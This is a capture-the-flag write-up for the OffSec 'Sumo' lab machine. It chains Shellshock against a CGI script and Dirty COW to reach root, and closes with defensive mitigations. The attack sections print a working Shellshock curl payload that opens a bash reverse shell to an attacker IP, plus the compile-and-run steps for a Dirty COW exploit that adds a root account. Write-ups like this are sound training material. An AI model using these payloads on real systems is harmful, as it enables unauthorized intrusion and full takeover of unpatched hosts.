Sumo is a simple machine that combines two well-known CVEs into one exploit chain. The box is running an ancient Apache 2.2.22 with a CGI script sitting wide open, which makes it vulnerable to Shellshock (CVE-2014–6271) — stick a payload in the User-Agent header, get a shell as www-data. From there, the kernel is so old it practically begs for Dirty COW (CVE-2016-5195), a race condition that lets you overwrite /etc/passwd and walk straight into root. Nothing exotic here, just two old wounds that never got patched.

Attack Path: Shellshock RCE (www-data) → Dirty COW kernel exploit (root)

Platform: OffSec Proving Grounds Play Machine: Sumo Difficulty: Easy OS: Linux (Ubuntu 12.04 LTS) Date: 2026–03–19

Table of Contents

1. Reconnaissance
   1.1  Nmap Port Scan
   1.2  Web Directory Enumeration
   1.3  CGI Script Discovery
2. Initial Access — Shellshock (CVE-2014-6271)
3. Post-Exploitation Enumeration
4. Privilege Escalation — Dirty COW (CVE-2016-5195)
5. Proof of Compromise
6. Vulnerability Summary
7. Defense & Mitigation
   7.1  Shellshock (CVE-2014-6271)
   7.2  Dirty COW (CVE-2016-5195)

1. Reconnaissance

1.1 Nmap Port Scan

nmap -Pn -A -F 192.168.198.87

Results:

Port     State  Service  Version
------   -----  -------  -----------------------------------------------
22/tcp   open   SSH      OpenSSH 5.9p1 Debian 5ubuntu1.10
80/tcp   open   HTTP     Apache httpd 2.2.22 (Ubuntu)

Only two ports open — SSH and HTTP. The Apache version banner is right there in the response headers, which immediately narrows things down. Apache 2.2.22 is from 2012 and has a long list of known issues. OS detection puts the kernel somewhere between 2.6.32 and 3.13, which is a bad sign for whoever owns this box.

1.2 Web Directory Enumeration

gobuster dir -u http://192.168.198.87 -w /usr/share/dirb/wordlists/common.txt

Results:

Path             Status  Notes
---------------  ------  ------------------------------
/cgi-bin/        403     Directory exists, access forbidden
/index.html      200     Default Apache page
/.htaccess       403     Access restricted
/server-status   403     Access restricted

/cgi-bin/ returning a 403 is the interesting part — the directory exists, Apache is just blocking directory listing. There's something in there worth finding. That's the next stop.

1.3 CGI Script Discovery

ffuf -u http://192.168.198.87/cgi-bin/FUZZ \
     -w /usr/share/wordlists/dirb/common.txt \
     -e .sh,.cgi,.pl,.py \
     -mc 200

Results:

Path                 Status  Size
-------------------  ------  --------
/cgi-bin/test        200     14 bytes
/cgi-bin/test.sh     200     14 bytes

There it is — test.sh. A shell script sitting in cgi-bin on an unpatched Apache server. At this point, Shellshock is basically confirmed before even sending the payload.

2. Initial Access — Shellshock (CVE-2014–6271)

Shellshock takes advantage of how older versions of Bash process environment variables.When a CGI script gets executed, Apache passes HTTP headers as environment variables to the shell. If Bash is vulnerable, anything after () { :; }; in one of those headers gets executed as a command — no authentication, no questions asked.

Exploit:

curl -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/192.168.45.165/4444 0>&1" \
     http://192.168.198.87/cgi-bin/test.sh

Listener:

nc -lvnp 4444

Shell came back as www-data. Initial access done.

3. Post-Exploitation Enumeration

First thing after landing — figure out what you're working with.

uname -a
# Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 GNU/Linux
cat /etc/issue
# Ubuntu 12.04 LTS

System Info:

Property       Value
-----------    ----------------------------
Hostname       ubuntu
OS             Ubuntu 12.04 LTS
Kernel         3.2.0-23-generic (April 2012)
Architecture   x86_64
Current User   www-data

Kernel from April 2012. Dirty COW affects everything from 2.6.22 up to 3.9 — this one lands right in the middle. The only thing left to check is whether gcc it is available on the box, since the exploit needs to be compiled locally.

which gcc
# /usr/bin/gcc
gcc --version
# gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3

gcc is present. We're good to go.

4. Privilege Escalation — Dirty COW (CVE-2016–5195)

Dirty COW is a race condition in the kernel's copy-on-write mechanism. The short version: an unprivileged user can win a race against the kernel's memory management and write to files they should only be able to read. The 40839.c variant abuses this to inject a new root-level entry directly into /etc/passwd.

1. Find the exploit:

searchsploit Dirty Cow

Several variants come up. 40839.c is the one that rewrites /etc/passwd — clean, reliable, works on Ubuntu 12.04.

2. Transfer to the target via wget or through the existing shell session.

3. Compile and run:

export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/4.6/
gcc -pthread 40839.c -o dirty -lcrypt
chmod +x dirty
./dirty

Output:

/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password123
Complete line:
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
mmap: 7fb236005000
...
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'password123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

The exploit injects firefart as a new user with UID and GID both set to 0 — effectively a second root account.

4. Switch user:

su firefart
# Password: password123
id
# uid=0(firefart) gid=0(root) groups=0(root)

Root.

5. Proof of Compromise

firefart@ubuntu:/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)

6. Vulnerability Summary

#   CVE              Vulnerability                        CVSS           Impact
--  ---------------  -----------------------------------  -------------  -----------------------------------------------
1   CVE-2014-6271    Shellshock — Bash CGI RCE            10.0 Critical  Unauthenticated RCE as www-data
2   CVE-2016-5195    Dirty COW — Kernel Priv Escalation   7.8 High       Local privilege escalation to root

7. Defense & Mitigation

7.1 Shellshock (CVE-2014–6271)

Root Cause: An unpatched Bash binary paired with a CGI script. Apache passes HTTP headers directly to the shell as environment variables — on a vulnerable Bash version, that's all an attacker needs.

Mitigations:

• Patch Bash. This was fixed in Bash 4.3 patch 25, released back in 2014. There's no excuse for running an unpatched version at this point. apt-get update && apt-get upgrade bash is the starting point.
• Kill CGI if you don't need it. Disable mod_cgi and mod_cgid entirely: a2dismod cgi cgid. If nothing relies on it, get rid of it.
• Move away from CGI shell scripts. Replace them with FastCGI, WSGI, or a proper application framework. A .sh file in cgi-bin It is a red flag in any era, let alone post-2014.
• Put a WAF in front of it. ModSecurity with the OWASP Core Rule Set will catch Shellshock payloads in headers. It's not a substitute for patching, but it adds a layer.
• Don't expose CGI to the internet without authentication. This endpoint had no authentication. Even a basic auth gate would have slowed things down.

7.2 Dirty COW (CVE-2016–5195)

Root Cause: A race condition in mm/gup.c — specifically in get_user_pages() — That lets an unprivileged process win a write to read-only memory. Once you can write to /etc/passwdThe game is over.

Mitigations:

• Patch the kernel. The fix landed in 4.8.3. Ubuntu 12.04 had backported patches available too — they just weren't applied here. Kernel patching needs to be treated as non-negotiable, not optional maintenance.
• Ditch end-of-life systems. Ubuntu 12.04 went EOL in April 2017. Running it in 2026 is indefensible. Migrate to a supported release — anything currently receiving security updates.
• Lock down critical files. chattr +i /etc/passwd /etc/shadow makes those files immutable even to root, which would have blocked this specific exploit variant. It's a compensating control, not a fix, but it buys time.
• Remove compilers from production servers. gcc on a web server is unnecessary and dangerous. If an attacker lands a shell as www-data, the last thing you want is a ready-made toolchain waiting for them. Strip it out.
• Harden the kernel. SELinux, AppArmor, grsecurity, or PaX all make race-condition exploits significantly harder to execute. At a minimum, AppArmor profiles for Apache should be enforced.
• Monitor the right things. Alerts should fire on: shells spawned from www-data, any write to /etc/passwd or /etc/shadow, gcc or make invoked by non-admin users, and new UID 0 entries appearing in /etc/passwd.
• File Integrity Monitoring. AIDE, Tripwire, or OSSEC watching /etc/passwd and /etc/shadow would have flagged the modification immediately. FIM on auth files is low-cost and high-value.

OffSec PG Play — for educational purposes only.